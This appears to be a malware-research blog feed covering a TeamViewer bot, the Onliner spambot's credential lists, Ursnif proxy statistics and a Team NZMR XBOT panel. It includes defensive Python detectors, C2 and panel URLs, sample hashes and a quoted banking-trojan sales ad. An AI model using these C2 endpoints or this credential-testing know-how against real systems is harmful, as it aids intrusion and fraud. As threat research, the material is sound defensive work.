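    "/start/includes/act_user.php": ("POST", {"hwid", "tv_id", "tv_pass"}),
    "/start/inc.php": ("POST", {"uuid", "tv_id", "tv_pass", "winver",
                                "username", "webcam", "mic"}),
}

# Constructed one-request-per-line format: "<METHOD> <url> <body-or-dash>".
LOG_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<url>\S+) (?P<body>\S+)$")


def classify(line):
    """Return beacon details for one log line, or None when it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    method, url, body = m.group("method", "url", "body")
    parts = urlsplit(url if "://" in url else "http://" + url)
    # The binary appends the path twice on POST ("start/inc.php/start/inc.php"),
    # so match on the endpoint prefix instead of the exact path.
    endpoint = next((ep for ep in BEACONS if parts.path.startswith(ep)), None)
    if endpoint is None or BEACONS[endpoint][0] != method:
        return None
    raw = parts.query if method == "GET" else ("" if body == "-" else body)
    fields = parse_qs(raw, keep_blank_values=True)
    if not BEACONS[endpoint][1] <= set(fields):
        return None
    ident = (fields.get("hwid") or fields.get("uuid") or [""])[0]
    return {
        "endpoint": endpoint,
        "known_host": parts.hostname in CNC_HOSTS,
        "hwid": ident,
        "hwid_format_ok": bool(HWID_RE.match(ident)),
        "tv_id": fields.get("tv_id", [""])[0],
    }


def scan(lines):
    """Return [(1-based line number, details)] for every line that beacons."""
    hits = []
    for n, line in enumerate(lines, 1):
        info = classify(line)
        if info:
            hits.append((n, info))
    return hits


# Constructed sample log: two real-looking beacons to rpc2.gdn, one beacon-shaped
# request to an unknown host with a malformed hwid, one act_user beacon, one benign.
SAMPLE_LOG = """\
GET http://rpc2.gdn/start/includes/tasks.php?hwid=71D7D653-460A-8BE7-264F6AF5 -
POST http://rpc2.gdn/start/inc.php/start/inc.php uuid=71D7D653-460A-8BE7-264F6AF5&tv_id=123456789&tv_pass=s3cr3t&winver=Windows+7&username=bob&webcam=device+is+available&mic=device+is+missing
GET http://198.51.100.20/start/includes/tasks.php?hwid=not-a-real-hwid -
POST http://rpc2.gdn/start/includes/act_user.php hwid=71D7D653-460A-8BE7-264F6AF5&tv_id=123456789&tv_pass=s3cr3t
GET http://www.example.invalid/news.php?id=42 -
"""

if __name__ == "__main__":
    for n, info in scan(SAMPLE_LOG.splitlines()):
        print(n, info)
```

A beacon-shaped request to a host outside CNC_HOSTS is still reported (with known_host False) so that new CNC domains show up; the hwid format check helps separate real bot traffic from scanners hitting the same paths.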
</br>
<h2>Notes</h2>
The TeamViewer part and the overall architecture of the code are the same, but the "in the wild" version looks like an updated, lighter version.</br>
This is very basic malware, but it works and it's very easy to use.</br></br>
The Readme.md of the GitHub version mentions a forum post: <code>http://ander-pub.cc/forum/threads/isxodniki-skrytogo-teamviewer.73/</code> which is currently down. If someone here has more information about this forum, I'm very curious :)</br>
</br>
<h1>Victims overview</h1>
In this campaign, crooks are targeting small companies in different countries (CN, AU, US, RU...). </br>
I've found call centers, accounting firms, etc.</br>
Example of call center:</br>
<center><a href="https://i.imgur.com/YE9qkpP.png"><img src="https://i.imgur.com/YE9qkpP.png" height=500px;/></a></center></br>
<center><a href="https://i.imgur.com/TthQp3P.png"><img src="https://i.imgur.com/TthQp3P.png" height=400px;/></a></center></br>
I don't think that victims are targeted by country but rather by business or "money capacity". </br>
</br>
<h1>Conclusion</h1>
I don't know if it's a fork or a copypasta, but I'm curious to know the story behind this malware and this campaign.</br>
</br>
<center><iframe src="https://giphy.com/embed/jmeAW1a0p3IR2" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Unpacked code, few victims, screencasting: all this reminds me more of a targeted attack than of typical mass cybercrime.</br>
</br>
<h1>Yara rules</h1>
<script src="https://pastebin.com/embed_js/H1hmdvPx/noheader"></script></br>
Happy hunting!
Benkow_ http://www.blogger.com/profile/00709869309686004611 noreply@blogger.com
tag:blogger.com,1999:blog-330713861169915021.post-8930848864615948443 2017-08-29T00:48:00.000-07:00 2019-05-18T04:10:01.020-07:00
<h1>From Onliner Spambot to millions of email's lists and credentials</h1>
Hey!
It's time for another writeup about a spambot. </br>
Here I will explain how I have found millions of emails and credentials on a spambot server and why your creds can be in these databases.</br>
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr">Processing the largest list of data ever seen in <a href="https://twitter.com/haveibeenpwned">@haveibeenpwned</a> courtesy of a nasty spambot. I'm in there, you probably are too.</p>— Troy Hunt (@troyhunt) <a href="https://twitter.com/troyhunt/status/902084044220809216">28 August 2017</a></blockquote>
</br>
I have written a lot about spambots on this blog, for many reasons. Spambots are often ignored by researchers and I don't understand why.</br>
In a successful cybercrime campaign there are different parts: the final payload is important, but the spamming process is very critical too.</br>
Some malware campaigns like Locky are successful partly because the spamming process works well.</br>
This case is a good example :).</br>
</br>
<h2>Spam the world</h2>
<iframe src="https://giphy.com/embed/V4eDyfpmUGIJW" width="475" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
As an introduction, we will have a look at what a spambot is, why crooks use them and why they need huge lists of credentials.</br>
In the past, it used to be easier for attackers to send mass spam: they just had to scan the Internet to find vulnerable SMTP servers (with weak passwords or in <a href="https://www.spamhaus.org/news/article/706/the-return-of-the-open-relays">Open Relay mode</a>) and use them to send spam.</br>
However, nowadays, it's more complicated. There are a lot of anti-spam companies, products and firewalls. Most of the open relays are blacklisted and the attackers have to find another way to send mass spam.</br>
Among the available options, I have seen 2 very common behaviours:
<h3>PHP Mailer</h3>
The most common trick I have seen is to use compromised websites. For instance, this kind of spamming campaign has been used for a big <a href="https://thisissecurity.stormshield.com/2016/04/12/gamarue-loves-malicious-javascript-too/">Andromeda campaign</a>.</br>
The principle is simple:
<ul>
<li>The spammer hacks a lot (10k/20k) of websites (via well-known vulnerabilities in WordPress, Joomla, OpenCart, FTP/SSH bruteforce, etc.) or buys access to a lot of websites in a random shop</li>
<li>He uses these websites to host a <a href="https://pastebin.com/8W6FXnZz">PHP script</a> in charge of sending emails. </li>
<li>He controls all the websites via a software or a web panel and uses them to send spam</li>
</ul>
Due to the almost infinite number of out-of-date websites on the Internet, it's difficult to blacklist every website, and it's really easy for the spammer to use them.</br>
<h3>Malware spammer</h3>
The other common way to send spam is more brutal. Here, the attacker creates or buys a specific malware used to infect people and send spam.</br>
The more people the attacker infects, the more he can distribute spam through different IPs.</br>
However, a random pwned Windows machine is not enough to send spam. For that, the attacker needs some email server (SMTP) credentials. This is where a spambot can concern you :)</br>
<iframe src="https://giphy.com/embed/75MVAB30DXwnm" width="480" height="288" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Indeed, to send spam, the attacker needs a huge list of SMTP credentials. To get one, there are only two options: create it or buy it :D</br>
And it's the same as for the IPs: the more SMTP servers he can find, the more he can distribute the campaign.</br>
Let's go through an example to see how attackers create SMTP credential lists:
<h2>Credentials: Spambots gasoline</h2>
I will take the Onliner spambot as an example. This spambot has been used since at least 2016 to spread a banking trojan called Gozi. I have seen this spambot targeting specific countries like Italy, or specific businesses like hotels.</br>
Some email examples:</br>
DHL notification:</br>
<iframe src="https://pastebin.com/embed_iframe/3XX0ZzXY/noheader" style="border:none;width:100%"></iframe>
</br>
Email targeting the hotel business:</br>
<iframe src="https://pastebin.com/embed_iframe/jP9PqmxJ/noheader" style="border:none;width:100%"></iframe>
</br>
If you're curious about this case, I have tried to give some details in 3 blog posts:
<ul>
<li><a href="https://benkowlab.blogspot.fr/2017/01/a-journey-inside-ursnif-campaign.html">A journey inside Gozi campaign</a></li>
<li><a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">Spambot safari #2 - Online Mail System</a></li>
<li><a href="https://benkowlab.blogspot.fr/2017/08/a-third-look-in-jsdropperursnif.html">A third look at JSDropper/Gozi campaign - Proxy Statistics</a></li>
</ul>
</br>
TL;DR: this malware, after infecting your machine, uses 2 modules:
<ul>
<li>A module in charge of sending spam</li>
<li>A module in charge of creating a huge list of SMTP credentials</li>
</ul>
</br>
To create the list, the attacker feeds the second module a list of emails and credentials like sales@cliffordanddrew.co.uk / 123456 or peter.warner@mcswholesale.co.uk / MysuperPass.</br>
Then, the module tries to send an email using this combination. If it works, the credentials are added to the SMTP list; otherwise they are ignored.</br>
Thanks to free email services like Outlook, Gmail or your ISP's, the attacker can assume that a lot of people reuse the same password, and use your Outlook address to send spam :)</br>
<a href="https://i.imgur.com/RAFhCU9.png"><img src="https://i.imgur.com/RAFhCU9.png" height=380px/></a></br>
It's difficult to know where those lists of credentials came from. I have obviously seen a lot of public leaks (like LinkedIn or Baidu, with every password in clear text), but credentials can also come from phishing campaigns, credential-stealing malware like Pony, or they can be bought in a shop. Somebody even showed me a spambot with a SQL injection scanner which scans the Internet, looks for SQLi and retrieves SQL tables with names like "user" or "admin".</br> </br>
Thanks to an open directory on the web server of the Onliner spambot CNC, I was able to grab all the spamming data.</br>
It's composed of ~40GB of emails, credentials and SMTP configuration.</br>
This data is composed of:
<ul>
<li>Huge lists of credentials like email:password (in clear text)</li>
<li>Huge lists of Emails to spam</li>
<li>Spambot configuration files</li>
</ul>
I have found around 80 million credentials (unsorted; it's an estimate, I cannot deal with such big txt files).</br> One part (~2 million) seems to come from a Facebook phishing campaign; those I have tested seem to be working and were not on HIBP.</br>
Therefore, it's difficult to say where your credentials came from.
</br>
<iframe src="https://giphy.com/embed/3osxYc2axjCJNsCXyE" width="480" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
<h2>Making email lists like a pro</h2>
Inside all this data, we can see a lot of email addresses (used as spam targets). </br>
Because I have been following these guys for almost a year I'm able to explain how they built these lists.</br>
</br>
After looking at the spambot logs, I have seen that it was used to send fingerprinting spam. What does this mean?</br>
Before starting a new malware campaign, the attacker used the spambot to send this kind of email:</br>
<iframe src="https://pastebin.com/embed_iframe/7aWBMNmY/noheader" style="border:none;width:100%"></iframe>
If you look at the email you will see that inside this random spam, there is a hidden 1x1 gif. This method is well known in the marketing industry.</br>
Indeed, when you open this random spam, a request with your IP and your User-Agent is sent to the server that hosts the gif. With this information, the spammer is able to know
when you opened the email, from where and on which device (iPhone? Outlook? ...). </br>
At the same time, the request also tells the attacker that the email address is valid and that people actually open spam :).</br>
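An added example from the receiving side (not the spambot's classification script and not code from the post): a Python check a mail gateway or analyst could run to spot this kind of fingerprinting pixel, i.e. a remote image that is 1x1 or hidden; the sample message below is constructed, with example.invalid hostnames.

```python
"""Detect tracking pixels in an email body.

Added example, not code from the post or the spambot. Parses the HTML part of
a message and reports remote <img> elements that are 1x1 or hidden, the
pattern the fingerprinting spam uses. The sample message is constructed.
"""
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the HTML body."""

    def __init__(self):
        super().__init__()
        self.imgs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.imgs.append({k.lower(): (v or "") for k, v in attrs})


def _is_invisible(attrs):
    """True when width/height are <= 1 px or inline style hides the image."""
    def dim(value):
        value = value.strip().lower().rstrip("px")
        return int(value) if value.isdigit() else None

    w, h = dim(attrs.get("width", "")), dim(attrs.get("height", ""))
    if w is not None and h is not None and w <= 1 and h <= 1:
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_tracking_pixels(raw_message):
    """Return the remote image URLs in raw_message that look like tracking pixels."""
    msg = message_from_string(raw_message, policy=policy.default)
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return []  # plain-text only: nothing can phone home on open
    collector = _ImgCollector()
    collector.feed(html_part.get_content())
    hits = []
    for attrs in collector.imgs:
        src = attrs.get("src", "")
        # cid:/data: images are embedded and do not trigger a request.
        if urlsplit(src).scheme.lower() not in ("http", "https"):
            continue
        if _is_invisible(attrs):
            hits.append(src)
    return hits


# Constructed sample: a DHL-style lure with an embedded logo, a 1x1 remote gif
# carrying a per-recipient id, and a normal-sized remote banner.
SAMPLE_MESSAGE = """\
From: "DHL" <noreply@example.invalid>
To: victim@example.invalid
Subject: Your parcel
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your parcel is waiting.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your parcel is waiting.</p>
<img src="cid:logo" width="200" height="60">
<img src="http://pixel.example.invalid/open.gif?u=1234" width="1" height="1" border="0">
<img src="http://cdn.example.invalid/banner.png" width="468" height="60">
</body></html>
--b1--
"""

if __name__ == "__main__":
    print(find_tracking_pixels(SAMPLE_MESSAGE))
```

Only the 1x1 remote gif is reported; the embedded cid: logo and the visible banner are not, so the check can be used to block or strip remote images selectively rather than all of them.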
This is an example of a classification script found on one Onliner spambot server:</br>
<iframe src="https://pastebin.com/embed_iframe/ZLagdg3E/noheader" style="border:none;width:100%"></iframe>
</br>
Example of output:</br>
<iframe src="https://pastebin.com/embed_iframe/MDSbQtBj/noheader" style="border:none;width:100%"></iframe>
</br>
</br>
As a reminder: <b>DON'T OPEN SPAM!</b>
<h2>Conclusion</h2>
If you're a malware researcher, it's time to look deeper into the spambot business. It's a creative market which interacts with a lot of other cybercrime businesses.</br>
Around spambots you will often find phishers, password stealer botmasters, website scanners, malware developers, dropper developers, payload hosters, and so on.</br>
The path may be short between the lame Pony you received last month in a stupid .ace archive and a spambot that spreads Gozi.</br>
</br>
<img src="https://i.imgur.com/4MxH2Vs.jpg"></br>
<h2>Appendix</h2>
</br>
Some urls found in spam configuration files:
</br>
Thanks to <a href="https://twitter.com/Hydraze">Hydraze</a> for reviewing \o/
Benkow_ http://www.blogger.com/profile/00709869309686004611 noreply@blogger.com
tag:blogger.com,1999:blog-330713861169915021.post-601499073070720835 2017-08-20T08:21:00.000-07:00 2017-12-01T04:41:31.807-08:00
<h1>A third look at JSDropper/ursnif campaign - Proxy Statistics</h1>
Hey </br>
</br>
I've already talked a lot about the <a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">Ursnif campaigns</a> against the EU and mainly Italy, spread by a JScript (you know, the JScript that contacts <code> /r6.php?cmd=p&id= / /l2.php?cmd=p&id= / /re.php?cmd=p&id= </code> etc.), but 6 months after my last blogpost the crooks are still working and I have enough data for some cool statistics.
</br>
For the last 6 months I've collected the access.log of one proxy used by this botnet. I'll try to detail that here.</br>
There is no magic, I've just used Splunk :D</br>
</br>
</br>
As a reminder, this campaign is used to spread Ursnif like this:</br>
<a href="https://i.imgur.com/Urjz5Ip.png"><img src="https://i.imgur.com/Urjz5Ip.png" height="270px"/></a>
</br>
On the same "proxy server", you can find several "proxy scripts" (usually 1 script per campaign), and those scripts look like this:</br>
<a href="https://i.imgur.com/oBTZJmS.png"><img src="https://i.imgur.com/oBTZJmS.png" height="170px"/></a>
</br>
So, I've retrieved the access.log of one of these proxies and extracted the traffic relative to our case.</br></br>
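As an added example of the kind of aggregation done here with Splunk (not the author's queries), the following Python computes, for each PHP proxy script, the hits, unique IPs, first-seen month and the share of the top IP from combined-format access.log lines, and flags the "one IP, a handful of hits" pattern used below to spot test proxies; the sample lines are constructed, reusing script names and two IPs from this post.

```python
"""Per-proxy-script statistics from an access.log.

Added example, not the author's Splunk queries. Groups requests by the PHP
proxy script that was hit and reports the numbers the post derives: hits,
unique IPs, first seen, share of the top IP, and whether the script looks
like a test proxy (a few hits, all from one IP). Sample lines are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache/nginx combined log format; only the fields we need are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def proxy_stats(lines, script_filter=r"\.php$"):
    """Return {script_name: stats dict} for every request whose file matches script_filter."""
    per_script = defaultdict(lambda: {"ips": Counter(), "first": None})
    wanted = re.compile(script_filter)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        script = m.group("path").split("?", 1)[0].rsplit("/", 1)[-1]
        if not wanted.search(script):
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        st = per_script[script]
        st["ips"][m.group("ip")] += 1
        if st["first"] is None or ts < st["first"]:
            st["first"] = ts
    out = {}
    for script, st in per_script.items():
        hits = sum(st["ips"].values())
        top_ip, top_n = st["ips"].most_common(1)[0]
        out[script] = {
            "hits": hits,
            "unique_ips": len(st["ips"]),
            "first_seen": st["first"].strftime("%B %Y"),
            "top_ip": top_ip,
            "top_ip_share": round(100.0 * top_n / hits, 2),
            # The post's heuristic for "test proxies": ~5 hits, all from one IP.
            "tests_only": len(st["ips"]) == 1 and hits <= 10,
        }
    return out


# Constructed sample log. 2.228.128.141 and 66.180.197.197 are IPs named in the
# post; 192.0.2.x / 198.51.100.x / 203.0.113.x are documentation addresses.
SAMPLE_LOG = """\
2.228.128.141 - - [12/Jun/2017:08:01:15 +0000] "GET /re.php?cmd=e HTTP/1.1" 200 512 "-" "Mozilla/4.0"
2.228.128.141 - - [12/Jun/2017:08:02:15 +0000] "GET /re.php?cmd=e HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [13/Jun/2017:10:00:00 +0000] "GET /re.php?cmd=e HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [14/Jun/2017:10:00:00 +0000] "POST /re.php?cmd=p&id=1 HTTP/1.1" 200 12 "-" "Mozilla/4.0"
66.180.197.197 - - [20/Jun/2017:11:00:00 +0000] "GET /0iSP0c.php HTTP/1.1" 200 3 "-" "curl/7.5"
66.180.197.197 - - [20/Jun/2017:11:00:05 +0000] "GET /0iSP0c.php HTTP/1.1" 200 3 "-" "curl/7.5"
192.0.2.4 - - [03/Feb/2017:09:00:00 +0000] "GET /term.php?cmd=e HTTP/1.1" 200 700 "-" "Mozilla/4.0"
192.0.2.5 - - [05/Feb/2017:09:00:00 +0000] "GET /term.php?cmd=e HTTP/1.1" 200 700 "-" "Mozilla/4.0"
192.0.2.4 - - [04/Feb/2017:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 700 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for script, stats in proxy_stats(SAMPLE_LOG.splitlines()).items():
        print(script, stats)
```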
<h1>Global</h1>
Some global statistics for 1 proxy:</br>
From February 2017 to August 2017</br>
<ul>
<li>
Total number of hits on all the proxy scripts: <b>924 021</b>
</li>
<li>
From <b>108 367</b> unique IPs
</li>
<li>
on 16 different PHP proxy scripts
</li>
</ul>
<table border=1>
<tr>
<td>Filename</td>
<td>Hits</td>
<td>First seen</td>
<td>Forwarded to (URL)</td>
<td>Malware</td>
</tr>
<tr>
<td>/3E2s4R.php</td>
<td>610787</td>
<td>June</td>
<td>http://194.247.13.196/asus/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/re.php</td>
<td>137352</td>
<td>June</td>
<td>http://94.177.196.246/loadere/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>term.php</td>
<td>121669</td>
<td>February
</td>
<td>http://94.177.196.246/loader/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>l2.php</td>
<td>52288</td>
<td>February
</td>
<td>http://109.120.142.156/loader2/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>r4.php</td>
<td>1848</td>
<td>February
</td>
<td>http://109.120.142.156/loader4/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>/0iSP0c.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/130D0G.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/1AtJai.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/HTsGeg.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/J65oH1.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/PaD8qo.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/XI2jHR.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/8QE2UX.php
</td>
<td>6</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/Xou0HC.php
</td>
<td>6</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/19pYvo.php
</td>
<td>5</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/LPQQLc.php
</td>
<td>5</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
</table>
We can see 2 different cases:
<ul>
<li>Some PHP proxies are used in production</li>
<li>Some PHP proxies seem to be used for tests only.</li>
</ul>
</br>
<h1>Tests proxies</h1>
I'll start with the "test proxies". I call them that because they have only a few hits (~5) and all the hits on those pages come from the same IP :]</br>
<b>66.180.197.197</b></br>
This IP is not new in this game :), do you remember <a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">the whitelisting feature</a> set in the spambot panel?</br>
This IP was in the list of allowed IPs in the spambot panel:</br>
<img src="https://i.imgur.com/4ZCZdwa.png" height=300 /></br>
<iframe src="https://giphy.com/embed/12bihLkHoPwHTi" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Proxy scripts are configured to forward traffic to hxxp://194.247.13.222/tess/; it's the Onliner spambot, probably the testing instance.
</br></br>
<h1>Production proxies</h1>
Some details about each proxy script:
<h2>3E2s4R.php</h2>
This one is my favourite.</br>
The proxy records 610 787 hits on this file, from ~100 000 unique IPs, and I'm unable to find any sample on public sandboxes.</br>
This is a lot of hits considering that these statistics concern only 1 proxy!</br>
It was used to forward the spambot traffic to 194.247.13.196.</br>
</br>
<h2>re.php</h2>
This one was hit 137 352 times by 1335 unique IPs. It is used to forward JSDropper traffic to 94.177.196.246.</br>
This proxy was used for the JSDropper campaign <b>"NEWIT"</b> (Ursnif)</br>
Interesting fact about this one: 51.28% of the hits come from the IP 2.228.128.141 (Italy).</br>
Some IOCs:</br>
samples:</br>
<ul>
<li>d5291865ff80cd7cc9f425a145351bb7234383f1</li>
<li>67e1c342f6b41d163a6208b3ccebb991c0650473</li>
</ul>
<h2>term.php</h2>
Used to forward JSDropper traffic to 94.177.196.246</br>
121 669 hits from 2259 unique IPs.</br>
It was used for the campaigns <b>"WASP", "iphone", "summer", "old", "u1", "NEWIT"</b> and <b>"404"</b> (Ursnif)</br>
</br>
Some IOCs:</br>
samples:</br>
<ul>
<li>2016dfb44f452adcdd96b7781fdfb581ac72b0f7392404805f08d57210d16ad9</li>
<li>a1bd385b59efe1be13da9e8a008e06a6fb6cc07acd2727be22d076c7a2b27155</li>
<li>01853d1552ca4032e5fdc251cc92d57dffd5912411666c7842106d730ada09f4</li>
</ul>
<h2>l2.php</h2>
Used to forward JSDropper traffic to 109.120.142.156</br>
52 288 hits from 716 unique IPs.</br>
This one is very old. I have logs from November 2016 for this script.</br>
At that time they were not using campaign or group names, and they were spreading ... Ursnif.</br>
</br>
Some IOCs:</br>
<h2>r4.php</h2>
And the last one: r4.php.</br>
1884 hits from 302 IPs. Used during the campaigns <b>"mk1"</b>, <b>"mk2"</b>, <b>"bomber"</b> and one with no name <b>""</b>.</br>
Some IOCs:</br>
urls:</br>
<ul>
<li>hxxp://191860.webhosting63.1blu.de/r4.php?cmd=e</li>
<li>hxxp://werbekalender-werbenotebooks.de/r4.php?cmd=e</li>
<li>http://positivemindstates.com/r4.php?cmd=e</li>
<li>di000240.host.inode.at/r4.php?cmd=e</li>
<li>http://patrickhess.de/r4.php?cmd=e</li>
</ul>
samples:</br>
<ul>
<li>c827511b425cbc91faf947f1c3d309db3dde7419fe8c892380a03c71b5196e0e</li>
</ul>
<h1>Résumé</h1>
<a href="https://i.imgur.com/H2MC92l.png"><img src="https://i.imgur.com/H2MC92l.png" height=650/></a></br>
This threat is starting to be very noisy; they keep spreading malware, always in the same way.</br>
If somebody reading this works on the Ursnif part, don't hesitate to ping me, I'll share my data :]</br>
</br>
I hope this example can help you better understand cybercrime threats. Happy hunting \o/</br>
<iframe src="https://giphy.com/embed/Q22kcRdASuBvW" width="480" height="370" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-76108744788224715792017-08-16T14:16:00.001-07:002017-10-13T11:47:17.767-07:00Quick look at another Alina fork: XBOT-POS Edit: In fact after looking at the sample it's a pure copy pasta of Tiny Nuke :) - cd025523e3aec57f809552b9d1adc4b89526cc632f6d4c481aa2c8c3501dda6b </br> </br>
Hi,
it's time for a new post. Today I'll have a look at "Team NZMR". </br>
I found this funny team by chance on Twitter via the bot <a href="https://twitter.com/ScumBots/">@ScumBots</a>
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr">Alina: <a href="https://t.co/ttyh5aEJDX">https://t.co/ttyh5aEJDX</a> C2:thzsmrjqqzpaz2mz[.]onion[.]link/al/loading[.]php,t[.]ht/al/loading[.]php,</p>— ScumBots (@ScumBots) <a href="https://twitter.com/ScumBots/status/897473640853372929">15 août 2017</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
I wanted to write this little blog post because I think it is interesting to see an Alina panel behind a .onion domain and, as you will see later, I like looking at weird panels :D.
</br>
Let's have a look at this server.
</br>
As we know, we have an Alina (<a href="http://www.xylibox.com/2013/10/inside-malware-campaign-alina-dexter.html">Well known POS malware</a>) panel at <code>thzsmrjqqzpaz2mz.onion.link/al/loading.php</code>. </br>
Samples: <code>26aa9709d0402157d9d36e4849b1f9bacecd8875169c7f26d7d40c5c0c3de298 (http://thzsmrjqqzpaz2mz.onion.link/al/Spark.exe)</code></br>
</br>
<a href="https://i.imgur.com/UPmYouS.png"><img src="https://i.imgur.com/UPmYouS.png" height=150px;></a>
</br>
In the same boring way, we can find:
<ul>
<li>
a Fareit/Pony panel at <code>https://thzsmrjqqzpaz2mz.onion.link/pn/admin.php</code> (I don't have a sample)
</li>
<li>
an <a href="http://blog.malwaremustdie.org/2016/06/mmd-0054-2016-atmos-botnet-and-facts.html">Atmos</a> at <code>https://thzsmrjqqzpaz2mz.onion.link/at/cp.php</code> :</br>
Sample e34720cc8ab3718413064f19af5cc704e95661e743293a19f218d3b675147525 (https://thzsmrjqqzpaz2mz.onion.link/at/files/us.exe)</br>
<a href="https://i.imgur.com/l4pciLn.png"><img src="https://i.imgur.com/l4pciLn.png" height=190px;></a>
</br>
Thanks to <a href="http://cybercrime-tracker.net/ccamdetail.php?hash=62702b2be0e290e01cfe43107009098caa19ce68">CCAM</a> we can get 2 more servers used by this team:
<ul>
<li>
http://netco1000.ddns.net/at/file.php
</li>
<li>
http://22klzn6kzjlwlmt2.onion.link/at/file.php
</li>
</ul>
</li>
</ul>
Those guys really want your creds and your credit card numbers :D</br>
<iframe src="https://giphy.com/embed/ZiDPVVQrm1IIM" width="480" height="234" frameBorder="0" class="giphy-embed" allowFullScreen></iframe> </br>
</br>
They also tried to deal in ransomware (<a href="https://id-ransomware.blogspot.fr/2017/07/nzmr-ransomware.html">NZMR Ransomware</a>) at <code>https://thzsmrjqqzpaz2mz.onion.link/ed2/</code> without success...</br>
<img src="https://i.imgur.com/5GzpeUq.png" height=300px;> </br>
</br>
But I wrote this quick blog post for the last panel.</br>
Let me introduce the XBOT panel \o/: <code>https://thzsmrjqqzpaz2mz.onion.link/panel/</code> </br>
(click to enlarge)</br>
<a href="http://imgur.com/Jd7FHd7"><img src="https://i.imgur.com/Jd7FHd7.png" height=300px;></a></br>
The bot ad:</br>
<code>
Selling xbot ,new bank trojan -- Modules -- Webinject -- Formgrabber -- Socket4/5 -- Hidden VNC</br>
New bot bank xbot is available for rent (800$/monthly) -- server on tornetwork/clearnet</br>
Customized programming service and web developer/c/c++/Python/NET/others</br>
Team Coder/NZMR</br>
xbot costs 3k $ modules available >webinject -- formgrabber -- Socket4/5 -- Hidden VNC</br>
When buying xbot what do you get?</br>
You will get the builder,bin/exe+socket.exe/server.exe hvnc</br>
[+] - Free installation on your server in tornetwork or clearnet, you choose</br>
[+] - monthly support paid 100 $ (you choose,with or without support)</br>
[+] - Update bot for new version 400 $</br>
[+] Rent xbot</br>
Panel access (Clearnet/Tornetwork)</br>
Bin (exe)</br>
Socket.exe/hvnc.exe</br>
Priçe</br>
800 $ monthly (First 6 customers, others 1k $)</br>
Support monthly 100 $ (btc)</br>
</code>
I don't have any sample yet, but if you have one, I'm REALLY interested :D. </br>
Thanks to Xylitol, we can see that this panel looks like a mix between Alina and Dexter. For example the URI scheme "/front/stats.php", the success status code 666, or this "Version Control" page:</br>
<a href="https://i.imgur.com/GNonEsC.png"><img src="https://i.imgur.com/GNonEsC.png" height=510px;></a></br>
This panel looks designed for banking stuff (webinjects) and POS malware.</br>
From the XBOT panel you can DL/Exec, start VNC sessions and socks sessions, and update bots:</br>
<a href="https://i.imgur.com/vrfPat4.png"><img src="https://i.imgur.com/vrfPat4.png" height=210px;></a></br>
</br>
We can also find some strange "webinjects" stuff:</br>
<a href="https://i.imgur.com/gBAT9rg.jpg"><img src="https://i.imgur.com/gBAT9rg.jpg" height=650px;></a></br>
where "view content" leads to this kind of data:</br>
